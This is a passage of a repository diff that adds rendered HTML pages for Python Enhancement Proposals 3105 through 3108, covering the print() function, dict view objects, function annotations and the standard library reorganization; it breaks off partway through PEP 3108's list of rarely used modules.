The ideas and proposals mentioned in this PEP are gleaned from +countless Python-Dev postings. Thanks to Jim Jewett, Mike Orr, +Jason Orendorff, and Christian Tanzer for suggesting specific +edits to this PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3104.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3105/index.html b/pep-3105/index.html new file mode 100644 index 00000000000..41064b146d2 --- /dev/null +++ b/pep-3105/index.html @@ -0,0 +1,257 @@ + + + + + + + + PEP 3105 – Make print a function | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3105 – Make print a function

+
+
Author:
+
Georg Brandl <georg at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
19-Nov-2006
+
Python-Version:
+
3.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

The title says it all – this PEP proposes a new print() builtin +that replaces the print statement and suggests a specific signature +for the new function.

+
+
+

Rationale

+

The print statement has long appeared on lists of dubious language +features that are to be removed in Python 3000, such as Guido’s “Python +Regrets” presentation [1]. As such, the objective of this PEP is not +new, though it might become much disputed among Python developers.

+

The following arguments for a print() function are distilled from a +python-3000 message by Guido himself [2]:

+
    +
  • print is the only application-level functionality that has a +statement dedicated to it. Within Python’s world, syntax is generally +used as a last resort, when something can’t be done without help from +the compiler. Print doesn’t qualify for such an exception.
  • +
  • At some point in application development one quite often feels the need +to replace print output by something more sophisticated, like +logging calls or calls into some other I/O library. With a print() +function, this is a straightforward string replacement, today it is +a mess adding all those parentheses and possibly converting >>stream +style syntax.
  • +
  • Having special syntax for print puts up a much larger barrier for +evolution, e.g. a hypothetical new printf() function is not too +far fetched when it will coexist with a print() function.
  • +
  • There’s no easy way to convert print statements into another call +if one needs a different separator, not spaces, or none at all. +Also, there’s no easy way at all to conveniently print objects with +some other separator than a space.
  • +
  • If print() is a function, it would be much easier to replace it within +one module (just def print(*args):...) or even throughout a program +(e.g. by putting a different function in __builtin__.print). As it is, +one can do this by writing a class with a write() method and +assigning that to sys.stdout – that’s not bad, but definitely a much +larger conceptual leap, and it works at a different level than print.
  • +
+
+
+

Specification

+

The signature for print(), taken from various mailings and recently +posted on the python-3000 list [3] is:

+
def print(*args, sep=' ', end='\n', file=None)
+
+
+

A call like:

+
print(a, b, c, file=sys.stderr)
+
+
+

will be equivalent to today’s:

+
print >>sys.stderr, a, b, c
+
+
+

while the optional sep and end arguments specify what is printed +between and after the arguments, respectively.

+

The softspace feature (a semi-secret attribute on files currently +used to tell print whether to insert a space before the first item) +will be removed. Therefore, there will not be a direct translation for +today’s:

+
print "a",
+print
+
+
+

which will not print a space between the "a" and the newline.

+
+
+

Backwards Compatibility

+

The changes proposed in this PEP will render most of today’s print +statements invalid. Only those which incidentally feature parentheses +around all of their arguments will continue to be valid Python syntax +in version 3.0, and of those, only the ones printing a single +parenthesized value will continue to do the same thing. For example, +in 2.x:

+
>>> print ("Hello")
+Hello
+>>> print ("Hello", "world")
+('Hello', 'world')
+
+
+

whereas in 3.0:

+
>>> print ("Hello")
+Hello
+>>> print ("Hello", "world")
+Hello world
+
+
+

Luckily, as it is a statement in Python 2, print can be detected +and replaced reliably and non-ambiguously by an automated tool, so +there should be no major porting problems (provided someone writes the +mentioned tool).

+
+
+

Implementation

+

The proposed changes were implemented in the Python 3000 branch in the +Subversion revisions 53685 to 53704. Most of the legacy code in the +library has been converted too, but it is an ongoing effort to catch +every print statement that may be left in the distribution.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3105.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3106/index.html b/pep-3106/index.html new file mode 100644 index 00000000000..ca830d4bcf0 --- /dev/null +++ b/pep-3106/index.html @@ -0,0 +1,434 @@ + + + + + + + + PEP 3106 – Revamping dict.keys(), .values() and .items() | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3106 – Revamping dict.keys(), .values() and .items()

+
+
Author:
+
Guido van Rossum
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
19-Dec-2006
+
Python-Version:
+
3.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to change the .keys(), .values() and .items() +methods of the built-in dict type to return a set-like or unordered +container object whose contents are derived from the underlying +dictionary rather than a list which is a copy of the keys, etc.; and +to remove the .iterkeys(), .itervalues() and .iteritems() methods.

+

The approach is inspired by that taken in the Java Collections +Framework [1].

+
+
+

Introduction

+

It has long been the plan to change the .keys(), .values() and +.items() methods of the built-in dict type to return a more +lightweight object than a list, and to get rid of .iterkeys(), +.itervalues() and .iteritems(). The idea is that code that currently +(in 2.x) reads:

+
for k, v in d.iteritems(): ...
+
+
+

should be rewritten as:

+
for k, v in d.items(): ...
+
+
+

(and similar for .itervalues() and .iterkeys(), except the latter is +redundant since we can write that loop as for k in d.)

+

Code that currently reads:

+
a = d.keys()    # assume we really want a list here
+
+
+

(etc.) should be rewritten as

+
+
a = list(d.keys())
+

There are (at least) two ways to accomplish this. The original plan +was to simply let .keys(), .values() and .items() return an iterator, +i.e. exactly what iterkeys(), itervalues() and iteritems() return in +Python 2.x. However, the Java Collections Framework [1] suggests +that a better solution is possible: the methods return objects with +set behavior (for .keys() and .items()) or multiset (== bag) behavior +(for .values()) that do not contain copies of the keys, values or +items, but rather reference the underlying dict and pull their values +out of the dict as needed.

+

The advantage of this approach is that one can still write code like +this:

+
a = d.items()
+for k, v in a: ...
+# And later, again:
+for k, v in a: ...
+
+
+

Effectively, iter(d.keys()) (etc.) in Python 3.0 will do what +d.iterkeys() (etc.) does in Python 2.x; but in most contexts we don’t +have to write the iter() call because it is implied by a for-loop.

+

The objects returned by the .keys() and .items() methods behave like +sets. The object returned by the values() method behaves like a much +simpler unordered collection – it cannot be a set because duplicate +values are possible.

+

Because of the set behavior, it will be possible to check whether two +dicts have the same keys by simply testing:

+
if a.keys() == b.keys(): ...
+
+
+

and similarly for .items().

+

These operations are thread-safe only to the extent that using them in +a thread-unsafe way may cause an exception but will not cause +corruption of the internal representation.

+

As in Python 2.x, mutating a dict while iterating over it using an +iterator has an undefined effect and will in most cases raise a +RuntimeError exception. (This is similar to the guarantees made by +the Java Collections Framework.)

+

The objects returned by .keys() and .items() are fully interoperable +with instances of the built-in set and frozenset types; for example:

+
set(d.keys()) == d.keys()
+
+
+

is guaranteed to be True (except when d is being modified +simultaneously by another thread).

+
+
+

Specification

+

I’m using pseudo-code to specify the semantics:

+
class dict:
+
+    # Omitting all other dict methods for brevity.
+    # The .iterkeys(), .itervalues() and .iteritems() methods
+    # will be removed.
+
+    def keys(self):
+        return d_keys(self)
+
+    def items(self):
+        return d_items(self)
+
+    def values(self):
+        return d_values(self)
+
+class d_keys:
+
+    def __init__(self, d):
+        self.__d = d
+
+    def __len__(self):
+        return len(self.__d)
+
+    def __contains__(self, key):
+        return key in self.__d
+
+    def __iter__(self):
+        for key in self.__d:
+            yield key
+
+    # The following operations should be implemented to be
+    # compatible with sets; this can be done by exploiting
+    # the above primitive operations:
+    #
+    #   <, <=, ==, !=, >=, > (returning a bool)
+    #   &, |, ^, - (returning a new, real set object)
+    #
+    # as well as their method counterparts (.union(), etc.).
+    #
+    # To specify the semantics, we can specify x == y as:
+    #
+    #   set(x) == set(y)   if both x and y are d_keys instances
+    #   set(x) == y        if x is a d_keys instance
+    #   x == set(y)        if y is a d_keys instance
+    #
+    # and so on for all other operations.
+
+class d_items:
+
+    def __init__(self, d):
+        self.__d = d
+
+    def __len__(self):
+        return len(self.__d)
+
+    def __contains__(self, (key, value)):
+        return key in self.__d and self.__d[key] == value
+
+    def __iter__(self):
+        for key in self.__d:
+            yield key, self.__d[key]
+
+    # As well as the set operations mentioned for d_keys above.
+    # However the specifications suggested there will not work if
+    # the values aren't hashable.  Fortunately, the operations can
+    # still be implemented efficiently.  For example, this is how
+    # intersection can be specified:
+
+    def __and__(self, other):
+        if isinstance(other, (set, frozenset, d_keys)):
+            result = set()
+            for item in other:
+                if item in self:
+                    result.add(item)
+            return result
+        if not isinstance(other, d_items):
+            return NotImplemented
+        d = {}
+        if len(other) < len(self):
+            self, other = other, self
+        for item in self:
+            if item in other:
+                key, value = item
+                d[key] = value
+        return d.items()
+
+    # And here is equality:
+
+    def __eq__(self, other):
+        if isinstance(other, (set, frozenset, d_keys)):
+            if len(self) != len(other):
+                return False
+            for item in other:
+                if item not in self:
+                    return False
+            return True
+        if not isinstance(other, d_items):
+            return NotImplemented
+        # XXX We could also just compare the underlying dicts...
+        if len(self) != len(other):
+            return False
+        for item in self:
+            if item not in other:
+                return False
+        return True
+
+    def __ne__(self, other):
+        # XXX Perhaps object.__ne__() should be defined this way.
+        result = self.__eq__(other)
+        if result is not NotImplemented:
+            result = not result
+        return result
+
+class d_values:
+
+    def __init__(self, d):
+        self.__d = d
+
+    def __len__(self):
+        return len(self.__d)
+
+    def __contains__(self, value):
+        # This is slow, and it's what "x in y" uses as a fallback
+        # if __contains__ is not defined; but I'd rather make it
+        # explicit that it is supported.
+        for v in self:
+             if v == value:
+                 return True
+        return False
+
+    def __iter__(self):
+        for key in self.__d:
+            yield self.__d[key]
+
+    def __eq__(self, other):
+        if not isinstance(other, d_values):
+            return NotImplemented
+        if len(self) != len(other):
+            return False
+        # XXX Sometimes this could be optimized, but these are the
+        # semantics: we can't depend on the values to be hashable
+        # or comparable.
+        olist = list(other)
+        for x in self:
+            try:
+                olist.remove(x)
+            except ValueError:
+                return False
+        assert olist == []
+        return True
+
+    def __ne__(self, other):
+        result = self.__eq__(other)
+        if result is not NotImplemented:
+            result = not result
+        return result
+
+
+

Notes:

+

The view objects are not directly mutable, but don’t implement +__hash__(); their value can change if the underlying dict is mutated.

+

The only requirements on the underlying dict are that it implements +__getitem__(), __contains__(), __iter__(), and __len__().

+

We don’t implement .copy() – the presence of a .copy() +method suggests that the copy has the same type as the original, but +that’s not feasible without copying the underlying dict. If you want +a copy of a specific type, like list or set, you can just pass one +of the above to the list() or set() constructor.

+

The specification implies that the order in which items +are returned by .keys(), .values() and .items() is the same (just as +it was in Python 2.x), because the order is all derived from the dict +iterator (which is presumably arbitrary but stable as long as a dict +isn’t modified). This can be expressed by the following invariant:

+
list(d.items()) == list(zip(d.keys(), d.values()))
+
+
+
+
+

Open Issues

+

Do we need more of a motivation? I would think that being able to do +set operations on keys and items without having to copy them should +speak for itself.

+

I’ve left out the implementation of various set operations. These +could still present small surprises.

+

It would be okay if multiple calls to d.keys() (etc.) returned the +same object, since the object’s only state is the dict to which it +refers. Is this worth having extra slots in the dict object for? +Should that be a weak reference or should the d_keys (etc.) object +live forever once created? Strawman: probably not worth the extra +slots in every dict.

+

Should d_keys, d_values and d_items have a public instance variable or +method through which one can retrieve the underlying dict? Strawman: +yes (but what should it be called?).

+

I’m soliciting better names than d_keys, d_values and d_items. These +classes could be public so that their implementations could be reused +by the .keys(), .values() and .items() methods of other mappings. Or +should they?

+

Should the d_keys, d_values and d_items classes be reusable? +Strawman: yes.

+

Should they be subclassable? Strawman: yes (but see below).

+

A particularly nasty issue is whether operations that are specified in +terms of other operations (e.g. .discard()) must really be implemented +in terms of those other operations; this may appear irrelevant but it +becomes relevant if these classes are ever subclassed. Historically, +Python has a really poor track record of specifying the semantics of +highly optimized built-in types clearly in such cases; my strawman is +to continue that trend. Subclassing may still be useful to add new +methods, for example.

+

I’ll leave the decisions (especially about naming) up to whoever +submits a working implementation.

+
+
+

References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3106.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3107/index.html b/pep-3107/index.html new file mode 100644 index 00000000000..e78e786f1a4 --- /dev/null +++ b/pep-3107/index.html @@ -0,0 +1,475 @@ + + + + + + + + PEP 3107 – Function Annotations | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3107 – Function Annotations

+
+
Author:
+
Collin Winter <collinwinter at google.com>, +Tony Lownds <tony at lownds.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
02-Dec-2006
+
Python-Version:
+
3.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP introduces a syntax for adding arbitrary metadata annotations +to Python functions [1].

+
+
+

Rationale

+

Because Python’s 2.x series lacks a standard way of annotating a +function’s parameters and return values, a variety of tools +and libraries have appeared to fill this gap. Some +utilise the decorators introduced in PEP 318, while others parse a +function’s docstring, looking for annotations there.

+

This PEP aims to provide a single, standard way of specifying this +information, reducing the confusion caused by the wide variation in +mechanism and syntax that has existed until this point.

+
+
+

Fundamentals of Function Annotations

+

Before launching into a discussion of the precise ins and outs of +Python 3.0’s function annotations, let’s first talk broadly about +what annotations are and are not:

+
    +
  1. Function annotations, both for parameters and return values, are +completely optional.
  2. +
  3. Function annotations are nothing more than a way of associating +arbitrary Python expressions with various parts of a function at +compile-time.

    By itself, Python does not attach any particular meaning or +significance to annotations. Left to its own, Python simply makes +these expressions available as described in Accessing Function +Annotations below.

    +

    The only way that annotations take on meaning is when they are +interpreted by third-party libraries. These annotation consumers +can do anything they want with a function’s annotations. For +example, one library might use string-based annotations to provide +improved help messages, like so:

    +
    def compile(source: "something compilable",
    +            filename: "where the compilable thing comes from",
    +            mode: "is this a single statement or a suite?"):
    +    ...
    +
    +
    +

    Another library might be used to provide typechecking for Python +functions and methods. This library could use annotations to +indicate the function’s expected input and return types, possibly +something like:

    +
    def haul(item: Haulable, *vargs: PackAnimal) -> Distance:
    +    ...
    +
    +
    +

    However, neither the strings in the first example nor the +type information in the second example have any meaning on their +own; meaning comes from third-party libraries alone.

    +
  4. +
  5. Following from point 2, this PEP makes no attempt to introduce +any kind of standard semantics, even for the built-in types. +This work will be left to third-party libraries.
  6. +
+
+
+

Syntax

+
+

Parameters

+

Annotations for parameters take the form of optional expressions that +follow the parameter name:

+
def foo(a: expression, b: expression = 5):
+    ...
+
+
+

In pseudo-grammar, parameters now look like identifier [: +expression] [= expression]. That is, annotations always precede a +parameter’s default value and both annotations and default values are +optional. Just like how equal signs are used to indicate a default +value, colons are used to mark annotations. All annotation +expressions are evaluated when the function definition is executed, +just like default values.

+

Annotations for excess parameters (i.e., *args and **kwargs) +are indicated similarly:

+
def foo(*args: expression, **kwargs: expression):
+    ...
+
+
+

Annotations for nested parameters always follow the name of the +parameter, not the last parenthesis. Annotating all parameters of a +nested parameter is not required:

+
def foo((x1, y1: expression),
+        (x2: expression, y2: expression)=(None, None)):
+    ...
+
+
+
+
+

Return Values

+

The examples thus far have omitted examples of how to annotate the +type of a function’s return value. This is done like so:

+
def sum() -> expression:
+    ...
+
+
+

That is, the parameter list can now be followed by a literal -> +and a Python expression. Like the annotations for parameters, this +expression will be evaluated when the function definition is executed.

+

The grammar for function definitions [11] is now:

+
decorator: '@' dotted_name [ '(' [arglist] ')' ] NEWLINE
+decorators: decorator+
+funcdef: [decorators] 'def' NAME parameters ['->' test] ':' suite
+parameters: '(' [typedargslist] ')'
+typedargslist: ((tfpdef ['=' test] ',')*
+                ('*' [tname] (',' tname ['=' test])* [',' '**' tname]
+                 | '**' tname)
+                | tfpdef ['=' test] (',' tfpdef ['=' test])* [','])
+tname: NAME [':' test]
+tfpdef: tname | '(' tfplist ')'
+tfplist: tfpdef (',' tfpdef)* [',']
+
+
+
+
+

Lambda

+

lambda’s syntax does not support annotations. The syntax of +lambda could be changed to support annotations, by requiring +parentheses around the parameter list. However it was decided +[12] not to make this change because:

+
    +
  1. It would be an incompatible change.
  2. +
  3. Lambdas are neutered anyway.
  4. +
  5. The lambda can always be changed to a function.
  6. +
+
+
+
+

Accessing Function Annotations

+

Once compiled, a function’s annotations are available via the +function’s __annotations__ attribute. This attribute is +a mutable dictionary, mapping parameter names to an object +representing the evaluated annotation expression

+

There is a special key in the __annotations__ mapping, +"return". This key is present only if an annotation was supplied +for the function’s return value.

+

For example, the following annotation:

+
def foo(a: 'x', b: 5 + 6, c: list) -> max(2, 9):
+    ...
+
+
+

would result in an __annotations__ mapping of

+
{'a': 'x',
+ 'b': 11,
+ 'c': list,
+ 'return': 9}
+
+
+

The return key was chosen because it cannot conflict with the name +of a parameter; any attempt to use return as a parameter name +would result in a SyntaxError.

+

__annotations__ is an empty, mutable dictionary if there are no +annotations on the function or if the functions was created from +a lambda expression.

+
+
+

Use Cases

+

In the course of discussing annotations, a number of use-cases have +been raised. Some of these are presented here, grouped by what kind +of information they convey. Also included are examples of existing +products and packages that could make use of annotations.

+
    +
  • Providing typing information
      +
    • Type checking ([3], [4])
    • +
    • Let IDEs show what types a function expects and returns ([16])
    • +
    • Function overloading / generic functions ([21])
    • +
    • Foreign-language bridges ([17], [18])
    • +
    • Adaptation ([20], [19])
    • +
    • Predicate logic functions
    • +
    • Database query mapping
    • +
    • RPC parameter marshaling ([22])
    • +
    +
  • +
  • Other information
      +
    • Documentation for parameters and return values ([23])
    • +
    +
  • +
+
+
+

Standard Library

+
+

pydoc and inspect

+

The pydoc module should display the function annotations when +displaying help for a function. The inspect module should change +to support annotations.

+
+
+
+

Relation to Other PEPs

+
+

Function Signature Objects (PEP 362)

+

Function Signature Objects should expose the function’s annotations. +The Parameter object may change or other changes may be warranted.

+
+
+
+

Implementation

+

A reference implementation has been checked into the py3k (formerly +“p3yk”) branch as revision 53170 [10].

+
+
+

Rejected Proposals

+
    +
  • The BDFL rejected the author’s idea for a special syntax for adding +annotations to generators as being “too ugly” [2].
  • +
  • Though discussed early on ([5], [6]), including +special objects in the stdlib for annotating generator functions and +higher-order functions was ultimately rejected as being more +appropriate for third-party libraries; including them in the +standard library raised too many thorny issues.
  • +
  • Despite considerable discussion about a standard type +parameterisation syntax, it was decided that this should also be +left to third-party libraries. ([7], +[8], [9]).
  • +
  • Despite yet more discussion, it was decided not to standardize +a mechanism for annotation interoperability. Standardizing +interoperability conventions at this point would be premature. +We would rather let these conventions develop organically, based +on real-world usage and necessity, than try to force all users +into some contrived scheme. ([13], [14], +[15]).
  • +
+
+
+

References and Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3107.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3108/index.html b/pep-3108/index.html new file mode 100644 index 00000000000..6d2a6eb79cc --- /dev/null +++ b/pep-3108/index.html @@ -0,0 +1,1495 @@ + + + + + + + + PEP 3108 – Standard Library Reorganization | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3108 – Standard Library Reorganization

+
+
Author:
+
Brett Cannon <brett at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
01-Jan-2007
+
Python-Version:
+
3.0
+
Post-History:
+
28-Apr-2008
+
+
+
+
Table of Contents +
+
+

Note

+

The merging of profile/cProfile as of Python 3.3 did not +occur, and thus is considered abandoned (although it would be +acceptable to do in the future).

+
+
+

Abstract

+

Just like the language itself, Python’s standard library (stdlib) has +grown over the years to be very rich. But over time some modules +have lost their need to be included with Python. There has also been +an introduction of a naming convention for modules since Python’s +inception that not all modules follow.

+

Python 3.0 presents a chance to remove modules that do not have +long term usefulness. This chance also allows for the renaming of +modules so that they follow the Python style guide. This +PEP lists modules that should not be included in Python 3.0 or which +need to be renamed.

+
+
+

Modules to Remove

+

Guido pronounced that “silly old stuff” is to be deleted from the +stdlib for Py3K [8]. This is open-ended on purpose. +Each module to be removed needs to have a justification as to why it +should no longer be distributed with Python. This can range from the +module being deprecated in Python 2.x to being for a platform that is +no longer widely used.

+

This section of the PEP lists the various modules to be removed. Each +subsection represents a different reason for modules to be +removed. Each module must have a specific justification on top of +being listed in a specific subsection so as to make sure only modules +that truly deserve to be removed are in fact removed.

+

When a reason mentions how long it has been since a module has been +“uniquely edited”, it is in reference to how long it has been since a +checkin was done specifically for the module and not for a change that +applied universally across the entire stdlib. If an edit time is not +denoted as “unique” then it is the last time the file was edited, +period.

+
+

Previously deprecated [done]

+

PEP 4 lists all modules that have been deprecated in the stdlib. +The specified motivations mirror those listed in +PEP 4. All modules listed +in the PEP at the time of the first alpha release of Python 3.0 will +be removed.

+

The entire contents of lib-old will also be removed. These modules +have already been removed from being imported but are kept in the +distribution for Python for users that rely upon the code.

+
    +
  • cfmfile
      +
    • Documented as deprecated since Python 2.4 without an explicit +reason.
    • +
    +
  • +
  • cl
      +
    • Documented as obsolete since Python 2.0 or earlier.
    • +
    • Interface to SGI hardware.
    • +
    +
  • +
  • md5
      +
    • Supplanted by the hashlib module.
    • +
    +
  • +
  • mimetools
      +
    • Documented as obsolete in a previous version.
    • +
    • Supplanted by the email package.
    • +
    +
  • +
  • MimeWriter
      +
    • Supplanted by the email package.
    • +
    +
  • +
  • mimify
      +
    • Supplanted by the email package.
    • +
    +
  • +
  • multifile
      +
    • Supplanted by the email package.
    • +
    +
  • +
  • posixfile
      +
    • Locking is better done by fcntl.lockf().
    • +
    +
  • +
  • rfc822
      +
    • Supplanted by the email package.
    • +
    +
  • +
  • sha
      +
    • Supplanted by the hashlib package.
    • +
    +
  • +
  • sv
      +
    • Documented as obsolete since Python 2.0 or earlier.
    • +
    • Interface to obsolete SGI Indigo hardware.
    • +
    +
  • +
  • timing
      +
    • Documented as obsolete since Python 2.0 or earlier.
    • +
    • time.clock() gives better time resolution.
    • +
    +
  • +
+
+
+

Platform-specific with minimal use [done]

+

Python supports many platforms, some of which are not widely used or +maintained. +And on some of these platforms there are modules that have limited use +to people on those platforms. Because of their limited usefulness it +would be better to no longer burden the Python development team with +their maintenance.

+

The modules mentioned below are documented. All undocumented modules +for the specified platforms will also be removed.

+
+

IRIX

+

The IRIX operating system is no longer produced [15]. +Removing all modules from the plat-irix[56] directory has been deemed +reasonable because of this fact.

+
    +
  • AL/al
      +
    • Provides sound support on Indy and Indigo workstations.
    • +
    • Both workstations are no longer available.
    • +
    • Code has not been uniquely edited in three years.
    • +
    +
  • +
  • cd/CD
      +
    • CD drive control for SGI systems.
    • +
    • SGI no longer sells machines with IRIX on them.
    • +
    • Code has not been uniquely edited in 14 years.
    • +
    +
  • +
  • cddb
      +
    • Undocumented.
    • +
    +
  • +
  • cdplayer
      +
    • Undocumented.
    • +
    +
  • +
  • cl/CL/CL_old
      +
    • Compression library for SGI systems.
    • +
    • SGI no longer sells machines with IRIX on them.
    • +
    • Code has not been uniquely edited in 14 years.
    • +
    +
  • +
  • DEVICE/GL/gl/cgen/cgensuport
      +
    • GL access, which is the predecessor to OpenGL.
    • +
    • Has not been edited in at least eight years.
    • +
    • Third-party libraries provide better support (PyOpenGL [12]).
    • +
    +
  • +
  • ERRNO
      +
    • Undocumented.
    • +
    +
  • +
  • FILE
      +
    • Undocumented.
    • +
    +
  • +
  • FL/fl/flp
      +
    • Wrapper for the FORMS library [16]
    • +
    • FORMS has not been edited in 12 years.
    • +
    • Library is not widely used.
    • +
    • First eight hits on Google are for Python docs for fl.
    • +
    +
  • +
  • fm
      +
    • Wrapper to the IRIS Font Manager library.
    • +
    • Only available on SGI machines which no longer come with IRIX.
    • +
    +
  • +
  • GET
      +
    • Undocumented.
    • +
    +
  • +
  • GLWS
      +
    • Undocumented.
    • +
    +
  • +
  • imgfile
      +
    • Wrapper for SGI libimage library for imglib image files +(.rgb files).
    • +
    • Python Imaging Library provides read-only support [13].
    • +
    • Not uniquely edited in 13 years.
    • +
    +
  • +
  • IN
      +
    • Undocumented.
    • +
    +
  • +
  • IOCTL
      +
    • Undocumented.
    • +
    +
  • +
  • jpeg
      +
    • Wrapper for JPEG (de)compressor.
    • +
    • Code not uniquely edited in nine years.
    • +
    • Third-party libraries provide better support +(Python Imaging Library [13]).
    • +
    +
  • +
  • panel
      +
    • Undocumented.
    • +
    +
  • +
  • panelparser
      +
    • Undocumented.
    • +
    +
  • +
  • readcd
      +
    • Undocumented.
    • +
    +
  • +
  • SV
      +
    • Undocumented.
    • +
    +
  • +
  • torgb
      +
    • Undocumented.
    • +
    +
  • +
  • WAIT
      +
    • Undocumented.
    • +
    +
  • +
+
+
+

Mac-specific modules

+

The Mac-specific modules are not well-maintained (e.g., the bgen +tool used to auto-generate many of the modules has never been +updated to support UCS-4). It is also not Python’s place to maintain +such a large amount of OS-specific modules. Thus all modules under +Lib/plat-mac and Mac are to be removed.

+

A stub module for proxy access will be provided for use by urllib.

+
    +
  • _builtinSuites
      +
    • Undocumented.
    • +
    • Package under lib-scriptpackages.
    • +
    +
  • +
  • Audio_mac
      +
    • Undocumented.
    • +
    +
  • +
  • aepack
      +
    • OSA support is better through third-party modules. +
    • +
    • Hard-coded endianness which breaks on Intel Macs.
    • +
    • Might need to rename if Carbon package dependent.
    • +
    +
  • +
  • aetools
      +
    • See aepack.
    • +
    +
  • +
  • aetypes
      +
    • See aepack.
    • +
    +
  • +
  • applesingle
      +
    • Undocumented.
    • +
    • AppleSingle is a binary file format for A/UX.
    • +
    • A/UX no longer distributed.
    • +
    +
  • +
  • appletrawmain
      +
    • Undocumented.
    • +
    +
  • +
  • appletrunner
      +
    • Undocumented.
    • +
    +
  • +
  • argvemulator
      +
    • Undocumented.
    • +
    +
  • +
  • autoGIL
      +
    • Very bad model for using Python with the CFRunLoop.
    • +
    +
  • +
  • bgenlocations
      +
    • Undocumented.
    • +
    +
  • +
  • buildtools
      +
    • Documented as deprecated since Python 2.3 without an explicit +reason.
    • +
    +
  • +
  • bundlebuilder
      +
    • Undocumented.
    • +
    +
  • +
  • Carbon
      +
    • Carbon development has stopped.
    • +
    • Does not support 64-bit systems completely.
    • +
    • Dependent on bgen which has never been updated to support UCS-4 +Unicode builds of Python.
    • +
    +
  • +
  • CodeWarrior
      +
    • Undocumented.
    • +
    • Package under lib-scriptpackages.
    • +
    +
  • +
  • ColorPicker
      +
    • Better to use Cocoa for GUIs.
    • +
    +
  • +
  • EasyDialogs
      +
    • Better to use Cocoa for GUIs.
    • +
    +
  • +
  • Explorer
      +
    • Undocumented.
    • +
    • Package under lib-scriptpackages.
    • +
    +
  • +
  • Finder
      +
    • Undocumented.
    • +
    • Package under lib-scriptpackages.
    • +
    +
  • +
  • findertools
      +
    • No longer useful.
    • +
    +
  • +
  • FrameWork
      +
    • Poorly documented.
    • +
    • Not updated to support Carbon Events.
    • +
    +
  • +
  • gensuitemodule
      +
    • See aepack.
    • +
    +
  • +
  • ic
  • +
  • icglue
  • +
  • icopen
      +
    • Not needed on OS X.
    • +
    • Meant to replace ‘open’ which is usually a bad thing to do.
    • +
    +
  • +
  • macerrors
      +
    • Undocumented.
    • +
    +
  • +
  • MacOS
      +
    • Would also mean the removal of binhex.
    • +
    +
  • +
  • macostools
  • +
  • macresource
      +
    • Undocumented.
    • +
    +
  • +
  • MiniAEFrame
      +
    • See aepack.
    • +
    +
  • +
  • Nav
      +
    • Undocumented.
    • +
    +
  • +
  • Netscape
      +
    • Undocumented.
    • +
    • Package under lib-scriptpackages.
    • +
    +
  • +
  • OSATerminology
  • +
  • pimp
      +
    • Undocumented.
    • +
    +
  • +
  • PixMapWrapper
      +
    • Undocumented.
    • +
    +
  • +
  • StdSuites
      +
    • Undocumented.
    • +
    • Package under lib-scriptpackages.
    • +
    +
  • +
  • SystemEvents
      +
    • Undocumented.
    • +
    • Package under lib-scriptpackages.
    • +
    +
  • +
  • Terminal
      +
    • Undocumented.
    • +
    • Package under lib-scriptpackages.
    • +
    +
  • +
  • terminalcommand
      +
    • Undocumented.
    • +
    +
  • +
  • videoreader
      +
    • No longer used.
    • +
    +
  • +
  • W
      +
    • No longer distributed with Python.
    • +
    +
  • +
+
+
+

Solaris

+
    +
  • SUNAUDIODEV/sunaudiodev
      +
    • Access to the sound card on Sun machines.
    • +
    • Code not uniquely edited in over eight years.
    • +
    +
  • +
+
+
+
+

Hardly used [done]

+

Some platform-independent modules are rarely used. There are a number of +possible explanations for this, including, ease of reimplementation, very +small audience or lack of adherence to more modern standards.

+
    +
  • audiodev
      +
    • Undocumented.
    • +
    • Not edited in five years.
    • +
    +
  • +
  • imputil
      +
    • Undocumented.
    • +
    • Never updated to support absolute imports.
    • +
    +
  • +
  • mutex
      +
    • Easy to implement using a semaphore and a queue.
    • +
    • Cannot block on a lock attempt.
    • +
    • Not uniquely edited since its addition 15 years ago.
    • +
    • Only useful with the ‘sched’ module.
    • +
    • Not thread-safe.
    • +
    +
  • +
  • stringold
      +
    • Function versions of the methods on string objects.
    • +
    • Obsolete since Python 1.6.
    • +
    • Any functionality not in the string object or module will be moved +to the string module (mostly constants).
    • +
    +
  • +
  • sunaudio
      +
    • Undocumented.
    • +
    • Not edited in over seven years.
    • +
    • The sunau module provides similar abilities.
    • +
    +
  • +
  • toaiff
      +
    • Undocumented.
    • +
    • Requires sox library to be installed on the system.
    • +
    +
  • +
  • user
      +
    • Easily handled by allowing the application specify its own +module name, check for existence, and import if found.
    • +
    +
  • +
  • new
      +
    • Just a rebinding of names from the ‘types’ module.
    • +
    • Can also call type built-in to get most types easily.
    • +
